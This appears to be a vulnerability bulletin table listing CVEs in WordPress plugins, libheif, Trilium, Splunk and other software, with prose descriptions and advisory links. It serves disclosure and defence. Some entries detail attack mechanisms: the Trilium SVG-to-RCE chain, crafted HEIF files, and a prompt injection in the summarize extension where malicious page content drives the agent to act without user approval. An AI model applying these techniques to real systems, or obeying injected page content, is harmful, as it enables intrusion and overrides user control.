| smub--All in One SEO Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic | The All in One SEO plugin for WordPress is vulnerable to Sensitive Information Exposure via 'internalOptions' localized script data in versions up to, and including, 4.9.7 due to sensitive internal option data being passed to wp_localize_script() in post editor contexts without effective masking for low-privilege users. This makes it possible for authenticated attackers, with contributor-level access and above, to view configured API/OAuth tokens and license-related values from page source. | 2026-05-20 | 4.3 | CVE-2026-5075 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8bc203-c17a-4b31-8f9e-695f9e638cda?source=cve https://plugins.trac.wordpress.org/changeset/3532318/all-in-one-seo-pack |
| smub--Photo Gallery, Sliders, Proofing and Themes NextGEN Gallery | The Photo Gallery, Sliders, Proofing and Themes - NextGEN Gallery plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to and including 4.2.0. This is due to insufficient object-level authorization in the image deletion REST flow where the permission callback for DELETE /imagely/v1/images/{id} only checks 'NextGEN Manage gallery' permissions and does not enforce gallery ownership or 'NextGEN Manage others gallery' permissions. This makes it possible for authenticated attackers, with Subscriber-level privileges and 'NextGEN Manage gallery' capability, to delete gallery images belonging to other users as well as their associated image files from disk when deleteImg is enabled (default). | 2026-05-20 | 4.3 | CVE-2026-6566 | https://www.wordfence.com/threat-intel/vulnerabilities/id/439809ad-21ea-4a0b-b1fd-5de9f8f5ee7a?source=cve https://plugins.trac.wordpress.org/changeset/3533432/nextgen-gallery |
| smub--Slider by Soliloquy Responsive Image Slider for WordPress | The Slider by Soliloquy - Responsive Image Slider for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 via the map_meta_cap. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract draft slider metadata including unpublished media URLs, captions, and slider configuration authored by administrators or editors. | 2026-05-22 | 4.3 | CVE-2026-7636 | https://www.wordfence.com/threat-intel/vulnerabilities/id/54115a9a-dadd-4f18-a139-02ec89f0a571?source=cve https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L90 https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L177 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L177 https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L125 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L125 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L90 https://plugins.trac.wordpress.org/changeset/3538404/soliloquy-lite/trunk/includes/global/posttype.php?old=3395148&old_path=soliloquy-lite%2Ftrunk%2Fincludes%2Fglobal%2Fposttype.php |
| SourceCodester--Hospitals Patient Records Management System | A security flaw has been discovered in SourceCodester Hospitals Patient Records Management System 1.0. Impacted is an unknown function of the file /admin/patients/view_history.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-23 | 6.3 | CVE-2026-9342 | VDB-365305 | SourceCodester Hospitals Patient Records Management System view_history.php sql injection VDB-365305 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812834 | sourcecodester Hospital's Patient Records Management System V1.0 SQL injection https://github.com/july-skyload/exp/issues/1 https://www.sourcecodester.com/ |
| Splunk--Splunk AI Toolkit | In Splunk AI Toolkit versions below 5.7.3, a low-privileged user that does not hold the 'admin' or 'power' roles could access confidential data that was restricted through `srchFilter` configurations on custom roles.<br><br>The app contains an `authorize.conf` configuration file with a `srchFilter` entry that modifies the built-in 'user' role. Because the Splunk platform combines inherited search filters with the `OR` SPL operator, the injected filter overrides more restrictive filters on child roles. | 2026-05-20 | 6.5 | CVE-2026-20238 | https://advisory.splunk.com/advisories/SVD-2026-0502 |
| steipete--summarize | Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks. | 2026-05-18 | 6.1 | CVE-2026-45243 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/222 https://github.com/steipete/summarize/commit/357544063af535bd574752622f9eb94be33ee5fd https://www.vulncheck.com/advisories/summarize-browser-extension-missing-authorization-via-content-script |
| steipete--summarize | Summarize prior to 0.15.1 contains a missing authorization vulnerability that allows attackers to execute browser automation actions without per-call user approval when the extension automation feature is enabled. Attackers can influence the agent through malicious page or summary content to invoke enabled extension automation tools such as navigation or debugger-backed actions, bypassing the final user approval step when a user interacts with attacker-controlled content. | 2026-05-18 | 5.4 | CVE-2026-45244 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/219 https://github.com/steipete/summarize/commit/e64fe3ecd1bb4fdc181dcfa88c96b9e1914ced0e https://www.vulncheck.com/advisories/summarize-unapproved-browser-automation-execution |
| steipete--summarize | Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems. | 2026-05-18 | 5.5 | CVE-2026-45246 | https://github.com/steipete/summarize/releases/tag/v0.15.2 https://github.com/steipete/summarize/pull/217 https://github.com/steipete/summarize/commit/9e990193650a23dab73f37d5e1964d574a44098b https://www.vulncheck.com/advisories/summarize-insecure-file-permissions-information-disclosure |
| storybookjs--telejson | TeleJSON prior to 6.0.0 contains a DOM-based cross-site scripting vulnerability in the parse() function that allows attackers to execute arbitrary JavaScript by delivering a crafted JSON payload containing a malicious _constructor-name_ property value. The custom reviver passes the constructor name directly to new Function() without sanitization when recreating object prototypes, enabling attackers to inject arbitrary JavaScript through vectors such as postMessage in cross-frame communication contexts to achieve script execution within the application. | 2026-05-20 | 6.1 | CVE-2026-47099 | https://github.com/storybookjs/telejson/security/advisories/GHSA-ccgf-5rwj-j3hv https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-47099/cve-2026-47099.md https://www.vulncheck.com/advisories/telejson-dom-based-xss-via-parse-function |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 792-byte HEIF sequence file with samples_per_chunk=0 in the stsc box causes an unsigned integer underflow in the Chunk constructor (m_last_sample = 0 + 0 - 1 = UINT32_MAX), mapping all samples to an empty chunk and resulting in a denial of service. When any sample is accessed, the library reads from index 0 of an empty std::vector, causing a guaranteed SEGV (null-page read). The file parses successfully without producing an error; the crash occurs on the first frame access. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32738 | https://github.com/strukturag/libheif/security/advisories/GHSA-7f2h-cmpf-v9ww |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and below, a crafted 800-byte HEIF sequence file causes an infinite loop in Box_stts::get_sample_duration(), consuming 100% CPU indefinitely with zero progress, leading to DoS. The loop has no iteration limit or timeout and is triggered during file open (parsing) - before any user interaction or image decoding. The process stays alive (no crash, no error logged), making it invisible to crash-based monitoring. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32739 | https://github.com/strukturag/libheif/security/advisories/GHSA-j9g7-q9hv-gq8c https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, when decoding a HEIF grid image with strict_decoding=false (the default), a corrupted tile silently fails to decode and the library returns heif_error_Ok with no indication of failure, leading to an uninitialized heap memory information leak. The canvas is allocated via create_clone_image_at_new_size() → plane.alloc() → new (std::nothrow) uint8_t[allocation_size] which does not zero the memory; only the alpha plane is explicitly initialized via fill_plane(), so the Y, Cb, and Cr planes contain whatever was previously at that heap address. The failed tile's region of the canvas is never written. It retains uninitialized heap data that is delivered to the caller as decoded pixel values (4,096 bytes per Y/Cb/Cr plane = 12,288+ bytes total). Any application using libheif to decode grid-based HEIF/AVIF files with default settings is vulnerable: a crafted .heic or .avif file causes 4,096+ bytes of heap memory to appear as pixel values in the decoded image, and the calling application receives heif_error_Ok, so it has no indication the output contains heap garbage. In server-side image processing, an uploaded crafted HEIF decoded and re-encoded (e.g., as PNG/JPEG for thumbnails, CDN, social media) can leak cross-user data such as auth tokens, database results, and other users' image data. This issue has been fixed in version 1.22.0. | 2026-05-19 | 6.5 | CVE-2026-32814 | https://github.com/strukturag/libheif/security/advisories/GHSA-4m8r-34pg-rvwc https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| strukturag--libheif | libheif is a HEIF and AVIF file format decoder and encoder. In versions 1.21.2 and prior, a malformed HEIF sequence file can trigger an out-of-bounds read in core sequence parsing logic, causing DoS. A malformed file can have stco.entry_count == 0 (creating no chunks) while still passing validation because saio.entry_count == 0 matches, but with saiz.sample_count > 0 the SampleAuxInfoReader constructor still enters its loop. This leads to an out-of-bounds dereference on the empty chunks[0] in chunked mode. | 2026-05-22 | 6.5 | CVE-2026-41069 | https://github.com/strukturag/libheif/security/advisories/GHSA-p82x-fpmv-576r https://github.com/strukturag/libheif/releases/tag/v1.22.0 |
| submone--Amazon Scraper | The Amazon Scraper plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8419 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c956e4c5-bf7e-4ec4-b795-74d477a61694?source=cve https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L49 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L49 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L13 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L13 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L26 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L26 https://plugins.trac.wordpress.org/browser/amazon-scraper/trunk/amazon-admin.php#L45 https://plugins.trac.wordpress.org/browser/amazon-scraper/tags/1.1/amazon-admin.php#L45 |
| svil4ok--Bottom Bar | The Bottom Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 0.1.7. This is due to missing nonce verification on the plugin's settings update forms handled in bottom-bar-admin.php. None of the three settings forms (main settings, sharing services, restore defaults) include a wp_nonce_field(), and the server-side processing code never calls check_admin_referer() or any equivalent nonce validation before processing POST data and calling update_option(). This makes it possible for unauthenticated attackers to trick a logged-in administrator into submitting a crafted request that updates plugin configuration options, such as changing the language, maximum post counts, or enabled sharing services. | 2026-05-20 | 4.3 | CVE-2026-6401 | https://www.wordfence.com/threat-intel/vulnerabilities/id/db0715ed-a06e-4a68-b9c3-408887cae113?source=cve https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L16 https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L16 https://plugins.trac.wordpress.org/browser/bottom-bar/trunk/bottom-bar-admin.php#L59 https://plugins.trac.wordpress.org/browser/bottom-bar/tags/0.1.7/bottom-bar-admin.php#L59 |
| syslink software AG--Avantra | Use of default password vulnerability in syslink software AG Avantra on Linux, Windows allows Try Common or Default Usernames and Passwords. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 5.1 | CVE-2026-8672 | https://support.avantra.com/hc/en-us/articles/5535551609759 |
| syslink software AG--Avantra | Unprotected transport of credentials vulnerability in syslink software AG Avantra on Linux, Windows allows Sniffing Attacks. This issue affects Avantra: before 25.3.0. | 2026-05-22 | 5.9 | CVE-2026-8673 | https://support.avantra.com/hc/en-us/articles/5535621927071 |
| Talend--Talend Administration Center | A stored cross-site scripting vulnerability has been found in the Talend Administration Center. An attacker with permission to manage servers can store a XSS payload that can be triggered by a different user. | 2026-05-20 | 5.4 | CVE-2026-9056 | https://community.qlik.com/t5/Official-Support-Articles/Security-fix-for-Qlik-Talend-Administration-Center-cross-site/ta-p/2548522 |
| TeamViewer--DEX (On-premises) | A broken access control vulnerability exists in the TeamViewer DEX Platform (On‑Premises) prior version 9.2. Certain backend API endpoints do not correctly enforce authorization checks, allowing an authenticated user with low privileges to perform actions and access resources intended only for higher‑privileged roles. An attacker with low‑privileged credentials may exploit this to gain unauthorized access to administrative or sensitive functionality. | 2026-05-22 | 5.4 | CVE-2026-8381 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2026-1005/ |
| techjewel--FluentCRM Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution | The FluentCRM - Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.9.87 via the 'SubscribeURL' parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Exploitation requires that the SES bounce handling key ('_fc_bounce_key') has never been stored (i.e., the site is in its default/unconfigured state with respect to SES bounce handling) as visiting the bounce configuration page auto-generates and stores a random key that causes the authentication check to evaluate correctly and reject unauthenticated requests. | 2026-05-22 | 5.4 | CVE-2026-7798 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c3ca2d7-7af9-401f-bc5a-1796c6253cb0?source=cve https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L113 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L113 https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L85 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L85 https://plugins.trac.wordpress.org/browser/fluent-crm/trunk/app/Hooks/Handlers/ExternalPages.php#L87 https://plugins.trac.wordpress.org/browser/fluent-crm/tags/2.9.87/app/Hooks/Handlers/ExternalPages.php#L87 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3532271%40fluent-crm&new=3532271%40fluent-crm&sfp_email=&sfph_mail= |
| Technitium--DNS Server | Technitium DNS Server aggressively tries to fetch missing RRSIG records or mismatched DNSKEY records. An attacker in control of a domain can cause a vulnerable system to generate excessive network traffic. Fixed in 15.0. | 2026-05-19 | 5.8 | CVE-2026-45557 | url url url |
| Tencent--WeKnora | A vulnerability has been found in Tencent WeKnora up to 0.3.6. Affected by this issue is the function getKnowledgeBaseForInitialization of the file internal/handler/initialization.go of the component Config API Endpoint. The manipulation of the argument kbId leads to authorization bypass. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 6.3 | CVE-2026-8786 | VDB-364410 | Tencent WeKnora Config API Endpoint initialization.go getKnowledgeBaseForInitialization authorization VDB-364410 | CTI Indicators (IOB, IOC, IOA) Submit #812172 | Tencent WeKnora <= v0.3.6 Insecure Direct Object Reference (CWE-639) https://gist.github.com/YLChen-007/1cdc50418f29af7ae671466425e52c7b |
| themefusion--Avada (Fusion) Builder | The Avada (Fusion) Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in all versions up to, and including, 3.15.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user (typically an administrator) accesses a page displaying dynamic user data (such as via the Dynamic Data feature pulling user biographical information). | 2026-05-21 | 6.4 | CVE-2026-1543 | https://www.wordfence.com/threat-intel/vulnerabilities/id/72a6b040-ed02-4561-82f2-4adb820bdf7d?source=cve https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 https://avada.com/documentation/avada-changelog/ |
| Themeisle--Visualizer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeisle Visualizer allows Stored XSS. This issue affects Visualizer: from n/a before 4.0.0. | 2026-05-20 | 6.5 | CVE-2026-24573 | https://patchstack.com/database/wordpress/plugin/visualizer/vulnerability/wordpress-visualizer-plugin-4-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| themeum--Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki - Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.6. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to view all Kirki frontend forms and read stored visitor form submission data, including contact details, messages, and any other visitor-provided information submitted through site forms. | 2026-05-19 | 6.5 | CVE-2026-8096 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1a4414b1-6a49-42f8-9927-93763d1502ce?source=cve https://plugins.trac.wordpress.org/browser/kirki/tags/6.0.4/includes/Ajax.php#L675 https://plugins.trac.wordpress.org/changeset/3535640/kirki |
| Tobias--CF7 WOW Styler | Missing Authorization vulnerability in Tobias CF7 WOW Styler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CF7 WOW Styler: from n/a through 1.7.6. | 2026-05-21 | 5.3 | CVE-2026-27393 | https://patchstack.com/database/wordpress/plugin/cf7-styler/vulnerability/wordpress-cf7-wow-styler-plugin-1-7-6-broken-access-control-vulnerability?_s_id=cve |
| Trend Micro, Inc.--TrendAI Apex One | A directory traversal vulnerability in the Apex One (on-premise) server could allow a pre-authenticated local attacker to modify a key table on the server to inject malicious code to deploy to agents on affected installations. This vulnerability is only exploitable on the on-premise version of Apex One and a potential attacker must have access to the Apex One Server and already obtained administrative credentials to the server via some other method to exploit this vulnerability. | 2026-05-21 | 6.7 | CVE-2026-34926 | https://success.trendmicro.com/en-US/solution/KA-0023430 https://success.trendmicro.com/ja-JP/solution/KA-0022974 https://jvn.jp/en/vu/JVNVU90583059/ https://www.jpcert.or.jp/english/at/2026/at260014.html |
| TriliumNext--Trilium | Trilium Notes is an open-source, cross-platform hierarchical note taking application for building large personal knowledge bases. Versions 0.102.1 and prior are vulnerable to Local File Inclusion, allowing an authenticated attacker to read sensitive arbitrary files from the server's filesystem. The uploadModifiedFileToAttachment function, which is called when a POST request is received to /api/attachments/{attachmentId}/upload-modified-file, replaces the content of the attachment with the content from another file (whose path is provided in filePath of Request body). After which the content of the attachment can be viewed at /api/attachments/{attachmentId}/download. This exposes sensitive system files such as SSH keys, credentials, configs, and OS files, potentially leading to remote code execution and compromise of co-hosted applications. This issue has been fixed in version 0.102.2. | 2026-05-19 | 6.8 | CVE-2026-35593 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-hf4x-22rg-pjjp https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. Versions 0.102.1 and prior contain a critical security flaw where lack of SVG sanitization combined with a disabled Content Security Policy (CSP) and a publicly reachable backend execution API results in an unauthenticated Remote Code Execution (RCE). The vulnerability arises from an insecure-by-design architecture: Trilium serves SVG attachments with the image/svg+xml MIME type without any sanitization, and it explicitly disables Helmet's Content Security Policy middleware, removing the primary defense against script execution in served assets. Because the malicious SVG runs under the Same-Origin Policy, it can issue a fetch('/') to extract the csrfToken from the document body. With that token, it can send a signed request to /api/script/exec to execute arbitrary Node.js code on the server. An attacker can compromise the entire server instance simply by tricking an authenticated user into viewing a shared SVG attachment. The issue has been fixed in version 0.102.2. | 2026-05-20 | 6.8 | CVE-2026-39311 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-p837-cxw3-m964 https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| TriliumNext--Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Electron configuration is vulnerable to TCC Bypass via Prompt Spoofing, allowing local attackers to trigger misleading macOS permission prompts by running malicious code under the identity of the trusted app. The root cause is that the RunAsNode fuse allows launching the app in a special Node.js mode using -e to execute arbitrary system commands with Trilium Notes's permissions and identity. An attacker can leverage this through a subprocess to request any sensitive permissions, such as access to hardware (camera, microphone) and TCC-protected files, causing the TCC system prompt to appear as if the request came from Trilium rather than the attacker's code, because macOS treats the subprocess as part of the parent application. Exploitation allows access to TCC-protected resources like the screen, camera, microphone, and folders such as ~/Documents and ~/Downloads, undermining macOS's security model and UI integrity through social engineering. This issue has been fixed in version 0.102.2. | 2026-05-19 | 5.5 | CVE-2026-39309 | https://github.com/TriliumNext/Trilium/security/advisories/GHSA-66pm-8hvq-2wwx https://github.com/TriliumNext/Trilium/releases/tag/v0.102.2 |
| Turkiye Electricity Transmission Corporation (TEA)--Mobile Application | Improper restriction of excessive authentication attempts vulnerability in Turkiye Electricity Transmission Corporation (TEÄ°AÅž) Mobile Application allows Brute Force. This issue affects Mobile Application: from 1.6.2 before 1.13. | 2026-05-21 | 6.3 | CVE-2026-1816 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286 |
| Turkiye Electricity Transmission Corporation (TEA)--Mobile Application | Insufficient session expiration vulnerability in Turkiye Electricity Transmission Corporation (TEÄ°AÅž) Mobile Application allows Session Hijacking. This issue affects Mobile Application: from 1.6.2 before 1.13. | 2026-05-21 | 5.7 | CVE-2026-1815 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286 |
| UserSpice--userSpice | userSpice 4.3.24 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the X-Forwarded-For HTTP header. Attackers can send crafted requests to the backup.php endpoint with XSS payloads in the X-Forwarded-For header that execute when administrators visit the audit log page. | 2026-05-23 | 6.1 | CVE-2018-25349 | ExploitDB-44871 VulnCheck Advisory: userSpice 4.3.24 Cross-Site Scripting via X-Forwarded-For Header |
| vatanyazilim--VatanSMS WP SMS | The VatanSMS WP SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `page` parameter in all versions up to, and including, 1.01. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-7462 | https://www.wordfence.com/threat-intel/vulnerabilities/id/96ef8459-1600-4ca0-93c6-0ee42f8adabd?source=cve https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/groups/groups.php#L34 https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/outbox/outbox.php#L5 https://plugins.trac.wordpress.org/browser/wp-sms-vatansms-com/trunk/includes/admin/subscribers/subscribers.php#L128 |
| VillaTheme--HAPPY | Missing Authorization vulnerability in VillaTheme HAPPY allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HAPPY: from n/a through 1.0.10. | 2026-05-21 | 6.5 | CVE-2026-39593 | https://patchstack.com/database/wordpress/plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| Webmin--Webmin | Webmin before 2.641 contains a stored cross-site scripting vulnerability in the email template description field of the System and Server Status module that allows low-privileged authenticated attackers to execute arbitrary JavaScript in the browser context of administrators by injecting unsanitized input stored in save_tmpl.cgi and rendered unescaped in list_tmpls.cgi. | 2026-05-21 | 5.4 | CVE-2026-22678 | https://webmin.com/changelog/webmin-2.641-released/ https://www.vulncheck.com/advisories/webmin-stored-xss-via-system-and-server-status |
| winking--Word 2 Cash | The Word 2 Cash plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to Stored Cross-Site Scripting in versions up to and including 0.9.2. This is due to the complete absence of nonce verification on the settings save handler in the w2c_admin() function, combined with missing input sanitization before storage and missing output escaping when rendering the stored value. The w2c-definitions POST parameter is saved raw via update_option() and later echoed without escaping inside a <textarea> element. This makes it possible for unauthenticated attackers to forge a request on behalf of a logged-in administrator, storing arbitrary JavaScript payloads that execute in the WordPress admin panel whenever the settings page is visited. | 2026-05-20 | 6.1 | CVE-2026-6395 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7ca5c-38aa-4413-83eb-29185cca2a74?source=cve https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L31 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L31 https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L20 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L20 https://plugins.trac.wordpress.org/browser/word-2-cash/trunk/word2cash.php#L18 https://plugins.trac.wordpress.org/browser/word-2-cash/tags/0.9.2/word2cash.php#L18 |
| WP Chill--Image Photo Gallery Final Tiles Grid | Missing Authorization vulnerability in WP Chill Image Photo Gallery Final Tiles Grid allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Photo Gallery Final Tiles Grid: from n/a through 3.6.11. | 2026-05-20 | 4.3 | CVE-2026-27424 | https://patchstack.com/database/wordpress/plugin/final-tiles-grid-gallery-lite/vulnerability/wordpress-image-photo-gallery-final-tiles-grid-plugin-3-6-11-broken-access-control-vulnerability?_s_id=cve |
| wpbean--WPB Floating Menu or Categories Sticky Floating Side Menu & Categories with Icons | The WPB Floating Menu & Categories for WordPress - Sticky Side Menu with Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Icon CSS Class' category field in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-21 | 4.9 | CVE-2026-4811 | https://www.wordfence.com/threat-intel/vulnerabilities/id/961702ff-60fb-41ff-99b0-a37ade051083?source=cve https://plugins.trac.wordpress.org/browser/wpb-floating-menu-or-categories/tags/1.0.8/admin/category-icon.php#L41 |
| wpdive--Nexa Blocks Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE | The Nexa Blocks - Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) in versions up to and including 1.1.1. This is due to the import_demo() function accepting a user-supplied URL in the demo_json_file POST parameter and passing it directly to wp_remote_get() without any URL validation or restriction against internal or private network destinations. The nexa_blocks_nonce required for the AJAX action is publicly exposed in the HTML source of any frontend page where the plugin is active via wp_localize_script on the enqueue_block_assets hook, effectively making the nonce available to all visitors and bypassing any intended authentication barrier. This makes it possible for unauthenticated attackers to make server-side HTTP requests to arbitrary internal or external destinations, potentially exposing internal services, cloud metadata endpoints such as the AWS instance metadata service, localhost services, and other resources not intended to be publicly accessible. A secondary SSRF vector also exists whereby image URLs extracted from the attacker-controlled JSON response are subsequently fetched via a second wp_remote_get() call, allowing chained exploitation through a crafted JSON payload. | 2026-05-20 | 5.4 | CVE-2026-6394 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4bb3067-7953-466d-a469-8a101450f133?source=cve https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L242 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L242 https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/template/template.php#L236 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/template/template.php#L236 https://plugins.trac.wordpress.org/browser/nexa-blocks/trunk/inc/classes/enqueue-assets.php#L84 https://plugins.trac.wordpress.org/browser/nexa-blocks/tags/1.1.1/inc/classes/enqueue-assets.php#L84 |
| WPFunnels Team--Mail Mint | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WPFunnels Team Mail Mint allows Retrieve Embedded Sensitive Data. This issue affects Mail Mint: from n/a through 1.19.5. | 2026-05-21 | 4.3 | CVE-2026-27349 | https://patchstack.com/database/wordpress/plugin/mail-mint/vulnerability/wordpress-mail-mint-plugin-1-19-5-sensitive-data-exposure-vulnerability?_s_id=cve |
| wpxpo--FastX | The FastX theme for WordPress is vulnerable to unauthorized limited plugin installation and activation due to missing capability checks on the 'ultp_install_callback' and 'ultp_activate_callback' functions in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate the PostX plugin. | 2026-05-22 | 4.3 | CVE-2026-2518 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6f5c4194-4f97-4f85-af90-e983ba9ce3a6?source=cve https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L264 https://themes.trac.wordpress.org/browser/fastx/1.0.2/classes/Initialization.php#L249 |
| wupsales--AI Chatbot & Workflow Automation by AIWU | The AI Chatbot & Workflow Automation by AIWU plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'X-Forwarded-For' header in versions up to, and including, 1.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Practical exploitation is constrained due to a 20-character storage limit. | 2026-05-20 | 6.4 | CVE-2026-2955 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8d434250-aa16-4ba1-a1f8-289371176545?source=cve https://plugins.trac.wordpress.org/changeset/3505998/ai-copilot-content-generator |
